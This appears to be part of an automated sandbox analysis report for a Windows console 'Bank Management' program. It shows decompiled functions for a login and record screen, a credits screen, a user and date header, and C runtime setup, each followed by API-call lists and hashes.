                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012326F2
                                                • _wprintf.LIBCMT ref: 01232711
                                                • _wprintf.LIBCMT ref: 0123274A
                                                • _fprintf.LIBCMT ref: 012327BD
                                                • _wprintf.LIBCMT ref: 012327E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                • API String ID: 3917209068-3252730458
                                                • Opcode ID: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction ID: bdb29ec0656845abf92865ede578f01533887ee038f045a38b4cf734633c5e7a
                                                • Opcode Fuzzy Hash: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction Fuzzy Hash: 5E51ABF1D70305FFDB14EFA8ED42BED7AB46FA5704F04402DE504B6280EAB092589766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E012321E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t28;
                                                				intOrPtr _t31;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t36;
                                                
                                                				_t33 = __esi;
                                                				_t32 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x1b, 4);
                                                				_push("BANK MANAGEMENT //");
                                                				E0123715C(_t28, __edi, __esi, __eflags);
                                                				_t35 = _t34 + 4;
                                                				E012312B0(0x19, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t42 = _v8 - 0x1b;
                                                					if(_v8 >= 0x1b) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, _t42);
                                                					_t35 = _t35 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(0x19, 8);
                                                				_push("Designed and Programmed by:");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				_t36 = _t35 + 4;
                                                				E012312B0(0x19, 9);
                                                				_v8 = 0;
                                                				while(1) {
                                                					__eflags = _v8 - 0x1b;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, __eflags);
                                                					_t36 = _t36 + 8;
                                                					_t31 = _v8 + 1;
                                                					__eflags = _t31;
                                                					_v8 = _t31;
                                                				}
                                                				E012312B0(0x21, 0xb);
                                                				_push("Ravi Agrawal");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xd);
                                                				_push("Sagar Sharma");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xf);
                                                				_push("Sawal Maskey");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x18, 0x14);
                                                				_push("Press Any key to continue...");
                                                				return E0123715C(_t28, _t32, _t33, __eflags);
                                                			}

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012321FF
                                                • _wprintf.LIBCMT ref: 01232232
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123224A
                                                • _wprintf.LIBCMT ref: 0123227D
                                                • _wprintf.LIBCMT ref: 01232295
                                                • _wprintf.LIBCMT ref: 012322AB
                                                • _wprintf.LIBCMT ref: 012322C1
                                                • _wprintf.LIBCMT ref: 012322D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                • API String ID: 1778593935-2888666035
                                                • Opcode ID: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction ID: 31672184893a7d4b51700bf9b68a38bed7aafc7c2a576a83b6f59c93706bf5af
                                                • Opcode Fuzzy Hash: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction Fuzzy Hash: 2A217FF1BB4316B6FB157BE85D03FBD31605BE1B54F014124BA41392C1E9F1261852A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E012320E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t9;
                                                				intOrPtr _t16;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t37;
                                                
                                                				_t37 = __fp0;
                                                				_t23 = __esi;
                                                				_t22 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x19, 1);
                                                				_push("Banking Management //");
                                                				E0123715C(_t20, __edi, __esi, __eflags);
                                                				E012312B0(5, 3);
                                                				_t9 = E01238230(0x1252ee4, "Admin");
                                                				_t26 = _t24 + 0xc;
                                                				if(_t9 == 0) {
                                                					 *0x1252240 = 1;
                                                				}
                                                				_t34 =  *0x1252240;
                                                				if( *0x1252240 == 0) {
                                                					_push(0x1252ee4);
                                                					_push("Current User : %s");
                                                					E0123715C(_t20, _t22, _t23, __eflags);
                                                					_t27 = _t26 + 8;
                                                				} else {
                                                					_push("Current User : Admin");
                                                					E0123715C(_t20, _t22, _t23, _t34);
                                                					_t27 = _t26 + 4;
                                                				}
                                                				_push("\t\t\t\tDate : ");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_push(0x1252f40);
                                                				E012316A0(_t22, _t23, _t37);
                                                				_push(0x1252f40);
                                                				_push("%s");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_t31 = _t27 + 0x14;
                                                				_t16 = E012312B0(1, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t35 = _v8 - 0x4e;
                                                					if(_v8 >= 0x4e) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t20, _t22, _t23, _t35);
                                                					_t31 = _t31 + 8;
                                                					_t16 = _v8 + 1;
                                                					_v8 = _t16;
                                                				}
                                                				return _t16;
                                                			}

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012320FF
                                                • _wprintf.LIBCMT ref: 0123213E
                                                • _wprintf.LIBCMT ref: 01232152
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123215F
                                                • __wstrtime.LIBCMT ref: 0123216C
                                                • _wprintf.LIBCMT ref: 01232188
                                                • __wstrtime.LIBCMT ref: 01232195
                                                • _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                • API String ID: 3817360410-644830535
                                                • Opcode ID: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction ID: aa7eb6eefecd4d31fd9186674e220e13b62dc7552f68dff6d8c843a5bed3c135
                                                • Opcode Fuzzy Hash: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction Fuzzy Hash: ED119EF1BF4303F6E7947BA26D43F6931505BA0B15F040168FF84392C1E5F1661801AB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0123A5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t81;
                                                				void* _t86;
                                                				long _t90;
                                                				signed int _t94;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				signed char _t103;
                                                				signed int _t105;
                                                				intOrPtr _t106;
                                                				intOrPtr* _t109;
                                                				signed char _t111;
                                                				long _t119;
                                                				signed int _t130;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				signed int _t138;
                                                				void** _t139;
                                                				signed int _t141;
                                                				void* _t142;
                                                				signed int _t143;
                                                				void** _t147;
                                                				signed int _t149;
                                                				void* _t150;
                                                				signed int _t154;
                                                				void* _t155;
                                                				void* _t160;
                                                
                                                				_push(0x64);
                                                				_push(0x124d8c0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				E0123BE5F(0xb);
                                                				_t130 = 0;
                                                				 *(_t155 - 4) = 0;
                                                				_t160 =  *0x1252f60 - _t130; // 0x0
                                                				if(_t160 == 0) {
                                                					_push(0x40);
                                                					_t141 = 0x20;
                                                					_push(_t141);
                                                					_t81 = E0123C55B();
                                                					_t134 = _t81;
                                                					 *(_t155 - 0x24) = _t134;
                                                					__eflags = _t134;
                                                					if(_t134 != 0) {
                                                						 *0x1252f60 = _t81;
                                                						 *0x1252f5c = _t141;
                                                						while(1) {
                                                							__eflags = _t134 - _t81 + 0x800;
                                                							if(_t134 >= _t81 + 0x800) {
                                                								break;
                                                							}
                                                							 *((short*)(_t134 + 4)) = 0xa00;
                                                							 *_t134 =  *_t134 | 0xffffffff;
                                                							 *(_t134 + 8) = _t130;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                							 *(_t134 + 0x38) = _t130;
                                                							 *(_t134 + 0x34) = _t130;
                                                							_t134 = _t134 + 0x40;
                                                							 *(_t155 - 0x24) = _t134;
                                                							_t81 =  *0x1252f60; // 0x0
                                                						}
                                                						GetStartupInfoW(_t155 - 0x74);
                                                						__eflags =  *((short*)(_t155 - 0x42));
                                                						if( *((short*)(_t155 - 0x42)) == 0) {
                                                							while(1) {
                                                								L31:
                                                								 *(_t155 - 0x2c) = _t130;
                                                								__eflags = _t130 - 3;
                                                								if(_t130 >= 3) {
                                                									break;
                                                								}
                                                								_t147 = (_t130 << 6) +  *0x1252f60;
                                                								 *(_t155 - 0x24) = _t147;
                                                								__eflags =  *_t147 - 0xffffffff;
                                                								if( *_t147 == 0xffffffff) {
                                                									L35:
                                                									_t147[1] = 0x81;
                                                									__eflags = _t130;
                                                									if(_t130 != 0) {
                                                										_t66 = _t130 - 1; // -1
                                                										asm("sbb eax, eax");
                                                										_t90 =  ~_t66 + 0xfffffff5;
                                                										__eflags = _t90;
                                                									} else {
                                                										_t90 = 0xfffffff6;
                                                									}
                                                									_t142 = GetStdHandle(_t90);
                                                									__eflags = _t142 - 0xffffffff;
                                                									if(_t142 == 0xffffffff) {
                                                										L47:
                                                										_t147[1] = _t147[1] | 0x00000040;
                                                										 *_t147 = 0xfffffffe;
                                                										_t94 =  *0x1253064;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                										}
                                                										goto L49;
                                                									} else {
                                                										__eflags = _t142;
                                                										if(_t142 == 0) {
                                                											goto L47;
                                                										}
                                                										_t98 = GetFileType(_t142);
                                                										__eflags = _t98;
                                                										if(_t98 == 0) {
                                                											goto L47;
                                                										}
                                                										 *_t147 = _t142;
                                                										_t99 = _t98 & 0x000000ff;
                                                										__eflags = _t99 - 2;
                                                										if(_t99 != 2) {
                                                											__eflags = _t99 - 3;
                                                											if(_t99 != 3) {
                                                												L46:
                                                												_t70 =  &(_t147[3]); // -19214164
                                                												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                												_t147[2] = _t147[2] + 1;
                                                												L49:
                                                												_t130 = _t130 + 1;
                                                												continue;
                                                											}
                                                											_t103 = _t147[1] | 0x00000008;
                                                											__eflags = _t103;
                                                											L45:
                                                											_t147[1] = _t103;
                                                											goto L46;
                                                										}
                                                										_t103 = _t147[1] | 0x00000040;
                                                										goto L45;
                                                									}
                                                								}
                                                								__eflags =  *_t147 - 0xfffffffe;
                                                								if( *_t147 == 0xfffffffe) {
                                                									goto L35;
                                                								}
                                                								_t147[1] = _t147[1] | 0x00000080;
                                                								goto L49;
                                                							}
                                                							 *(_t155 - 4) = 0xfffffffe;
                                                							E0123A8A6();
                                                							L2:
                                                							_t86 = 1;
                                                							L3:
                                                							return E012391A5(_t86);
                                                						}
                                                						_t105 =  *(_t155 - 0x40);
                                                						__eflags = _t105;
                                                						if(_t105 == 0) {
                                                							goto L31;
                                                						}
                                                						_t135 =  *_t105;
                                                						 *(_t155 - 0x1c) = _t135;
                                                						_t106 = _t105 + 4;
                                                						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                						 *(_t155 - 0x20) = _t106 + _t135;
                                                						__eflags = _t135 - 0x800;
                                                						if(_t135 >= 0x800) {
                                                							_t135 = 0x800;
                                                							 *(_t155 - 0x1c) = 0x800;
                                                						}
                                                						_t149 = 1;
                                                						__eflags = 1;
                                                						 *(_t155 - 0x30) = 1;
                                                						while(1) {
                                                							__eflags =  *0x1252f5c - _t135; // 0x3
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t138 = E0123C55B(_t141, 0x40);
                                                							 *(_t155 - 0x24) = _t138;
                                                							__eflags = _t138;
                                                							if(_t138 != 0) {
                                                								0x1252f60[_t149] = _t138;
                                                								 *0x1252f5c =  *0x1252f5c + _t141;
                                                								__eflags =  *0x1252f5c;
                                                								while(1) {
                                                									__eflags = _t138 - 0x1252f60[_t149] + 0x800;
                                                									if(_t138 >= 0x1252f60[_t149] + 0x800) {
                                                										break;
                                                									}
                                                									 *((short*)(_t138 + 4)) = 0xa00;
                                                									 *_t138 =  *_t138 | 0xffffffff;
                                                									 *(_t138 + 8) = _t130;
                                                									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                									 *(_t138 + 0x38) = _t130;
                                                									 *(_t138 + 0x34) = _t130;
                                                									_t138 = _t138 + 0x40;
                                                									 *(_t155 - 0x24) = _t138;
                                                								}
                                                								_t149 = _t149 + 1;
                                                								 *(_t155 - 0x30) = _t149;
                                                								_t135 =  *(_t155 - 0x1c);
                                                								continue;
                                                							}
                                                							_t135 =  *0x1252f5c; // 0x3
                                                							 *(_t155 - 0x1c) = _t135;
                                                							break;
                                                						}
                                                						_t143 = _t130;
                                                						 *(_t155 - 0x2c) = _t143;
                                                						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                						_t139 =  *(_t155 - 0x20);
                                                						while(1) {
                                                							__eflags = _t143 - _t135;
                                                							if(_t143 >= _t135) {
                                                								goto L31;
                                                							}
                                                							_t150 =  *_t139;
                                                							__eflags = _t150 - 0xffffffff;
                                                							if(_t150 == 0xffffffff) {
                                                								L26:
                                                								_t143 = _t143 + 1;
                                                								 *(_t155 - 0x2c) = _t143;
                                                								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                								_t139 =  &(_t139[1]);
                                                								 *(_t155 - 0x20) = _t139;
                                                								continue;
                                                							}
                                                							__eflags = _t150 - 0xfffffffe;
                                                							if(_t150 == 0xfffffffe) {
                                                								goto L26;
                                                							}
                                                							_t111 =  *_t109;
                                                							__eflags = _t111 & 0x00000001;
                                                							if((_t111 & 0x00000001) == 0) {
                                                								goto L26;
                                                							}
                                                							__eflags = _t111 & 0x00000008;
                                                							if((_t111 & 0x00000008) != 0) {
                                                								L24:
                                                								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1252f60[_t143 >> 5];
                                                								 *(_t155 - 0x24) = _t154;
                                                								 *_t154 =  *_t139;
                                                								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                								_t38 = _t154 + 0xc; // 0xd
                                                								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                								_t39 = _t154 + 8;
                                                								 *_t39 =  *(_t154 + 8) + 1;
                                                								__eflags =  *_t39;
                                                								_t139 =  *(_t155 - 0x20);
                                                								L25:
                                                								_t135 =  *(_t155 - 0x1c);
                                                								goto L26;
                                                							}
                                                							_t119 = GetFileType(_t150);
                                                							_t139 =  *(_t155 - 0x20);
                                                							__eflags = _t119;
                                                							if(_t119 == 0) {
                                                								goto L25;
                                                							}
                                                							goto L24;
                                                						}
                                                						goto L31;
                                                					}
                                                					E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                					_t86 = 0;
                                                					goto L3;
                                                				}
                                                				E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                				goto L2;
                                                			}
                                                0x0123a862
                                                0x0123a868
                                                0x0123a88f
                                                0x0123a88f
                                                0x00000000
                                                0x0123a88f
                                                0x0123a854
                                                0x0123a854
                                                0x0123a856
                                                0x0123a856
                                                0x00000000
                                                0x0123a856
                                                0x0123a847
                                                0x00000000
                                                0x0123a847
                                                0x0123a826
                                                0x0123a7f0
                                                0x0123a7f3
                                                0x00000000
                                                0x00000000
                                                0x0123a7fb
                                                0x00000000
                                                0x0123a7fb
                                                0x0123a895
                                                0x0123a89c
                                                0x0123a616
                                                0x0123a618
                                                0x0123a619
                                                0x0123a61e
                                                0x0123a61e
                                                0x0123a6a8
                                                0x0123a6ab
                                                0x0123a6ad
                                                0x00000000
                                                0x00000000
                                                0x0123a6b3
                                                0x0123a6b5
                                                0x0123a6b8
                                                0x0123a6bb
                                                0x0123a6c0
                                                0x0123a6c8
                                                0x0123a6ca
                                                0x0123a6cc
                                                0x0123a6ce
                                                0x0123a6ce
                                                0x0123a6d3
                                                0x0123a6d3
                                                0x0123a6d4
                                                0x0123a6d7
                                                0x0123a6d7
                                                0x0123a6dd
                                                0x00000000
                                                0x00000000
                                                0x0123a6e9
                                                0x0123a6eb
                                                0x0123a6ee
                                                0x0123a6f0
                                                0x0123a784
                                                0x0123a78b
                                                0x0123a78b
                                                0x0123a791
                                                0x0123a79d
                                                0x0123a79f
                                                0x00000000
                                                0x00000000
                                                0x0123a7a1
                                                0x0123a7a7
                                                0x0123a7aa
                                                0x0123a7ad
                                                0x0123a7b1
                                                0x0123a7b7
                                                0x0123a7ba
                                                0x0123a7bd
                                                0x0123a7c0
                                                0x0123a7c0
                                                0x0123a7c5
                                                0x0123a7c6
                                                0x0123a7c9
                                                0x00000000
                                                0x0123a7c9
                                                0x0123a6f6
                                                0x0123a6fc
                                                0x00000000
                                                0x0123a6fc
                                                0x0123a6ff
                                                0x0123a701
                                                0x0123a704
                                                0x0123a707
                                                0x0123a70a
                                                0x0123a70a
                                                0x0123a70c
                                                0x00000000
                                                0x00000000
                                                0x0123a712
                                                0x0123a714
                                                0x0123a717
                                                0x0123a771
                                                0x0123a771
                                                0x0123a772
                                                0x0123a778
                                                0x0123a779
                                                0x0123a77c
                                                0x0123a77f
                                                0x00000000
                                                0x0123a77f
                                                0x0123a719
                                                0x0123a71c
                                                0x00000000
                                                0x00000000
                                                0x0123a71e
                                                0x0123a720
                                                0x0123a722
                                                0x00000000
                                                0x00000000
                                                0x0123a724
                                                0x0123a726
                                                0x0123a736
                                                0x0123a743
                                                0x0123a74a
                                                0x0123a74f
                                                0x0123a756
                                                0x0123a75e
                                                0x0123a762
                                                0x0123a768
                                                0x0123a768
                                                0x0123a768
                                                0x0123a76b
                                                0x0123a76e
                                                0x0123a76e
                                                0x00000000
                                                0x0123a76e
                                                0x0123a729
                                                0x0123a72f
                                                0x0123a732
                                                0x0123a734
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123a734
                                                0x00000000
                                                0x0123a70a
                                                0x0123a642
                                                0x0123a64a
                                                0x00000000
                                                0x0123a64a
                                                0x0123a60e
                                                0x00000000

                                                APIs
                                                • __lock.LIBCMT ref: 0123A5F0
                                                  • Part of subcall function 0123BE5F: __mtinitlocknum.LIBCMT ref: 0123BE71
                                                  • Part of subcall function 0123BE5F: EnterCriticalSection.KERNEL32(?,?,0123D668,0000000D,?,?,?,?,0124DA28,00000008,0123D601,00000000,00000000,01238F04,01241E56,00000000), ref: 0123BE8A
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A60E
                                                • __calloc_crt.LIBCMT ref: 0123A627
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A642
                                                • GetStartupInfoW.KERNEL32(?,0124D8C0,00000064), ref: 0123A697
                                                • __calloc_crt.LIBCMT ref: 0123A6E2
                                                • GetFileType.KERNEL32(00000001), ref: 0123A729
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0123A762
                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0123A81B
                                                • GetFileType.KERNEL32(00000000), ref: 0123A82D
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(-01252F54,00000FA0), ref: 0123A862
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1456538442-0
                                                • Opcode ID: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction ID: d3a5339f0ff54ce574991e69b7e1bb8cd5b723a080aac4cff005c7f88482fc43
                                                • Opcode Fuzzy Hash: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction Fuzzy Hash: 9191E0B1924346CFDB25CFA8D8845ADBBB4AF85324B24426ED5A6EB2D1D7349803CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01238E23(void* __eflags, signed int _a4) {
                                                				void* _t12;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				intOrPtr _t18;
                                                				void* _t22;
                                                				signed int _t35;
                                                				long _t40;
                                                
                                                				_t13 = E0123A5A7(_t12);
                                                				if(_t13 >= 0) {
                                                					_t35 = _a4;
                                                					if(E01240132(_t35) == 0xffffffff) {
                                                						L10:
                                                						_t40 = 0;
                                                					} else {
                                                						_t18 =  *0x1252f60; // 0x0
                                                						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                								goto L8;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						} else {
                                                							L7:
                                                							_t22 = E01240132(2);
                                                							if(E01240132(1) == _t22) {
                                                								goto L10;
                                                							} else {
                                                								L8:
                                                								if(CloseHandle(E01240132(_t35)) != 0) {
                                                									goto L10;
                                                								} else {
                                                									_t40 = GetLastError();
                                                								}
                                                							}
                                                						}
                                                					}
                                                					E012400AC(_t35);
                                                					 *((char*)( *((intOrPtr*)(0x1252f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                					if(_t40 == 0) {
                                                						_t16 = 0;
                                                					} else {
                                                						_t16 = E01238EDE(_t40) | 0xffffffff;
                                                					}
                                                					return _t16;
                                                				} else {
                                                					return _t13 | 0xffffffff;
                                                				}
                                                			}











                                                APIs
                                                • __ioinit.LIBCMT ref: 01238E26
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                • __get_osfhandle.LIBCMT ref: 01238E3A
                                                • __get_osfhandle.LIBCMT ref: 01238E65
                                                • __get_osfhandle.LIBCMT ref: 01238E6E
                                                • __get_osfhandle.LIBCMT ref: 01238E7A
                                                • CloseHandle.KERNEL32(00000000,01232656,00000000,?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E81
                                                • GetLastError.KERNEL32(?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E8B
                                                • __free_osfhnd.LIBCMT ref: 01238E98
                                                • __dosmaperr.LIBCMT ref: 01238EBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                • String ID:
                                                • API String ID: 974577687-0
                                                • Opcode ID: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction ID: 2e61fbbffd079c0724c4cb380e572d66de274ccfef6c0ece69cbc68b92e70275
                                                • Opcode Fuzzy Hash: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction Fuzzy Hash: 921125B2A312125AE636227CA84877E7B595FD1734F150309FB288F1C2EAB4D4818260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
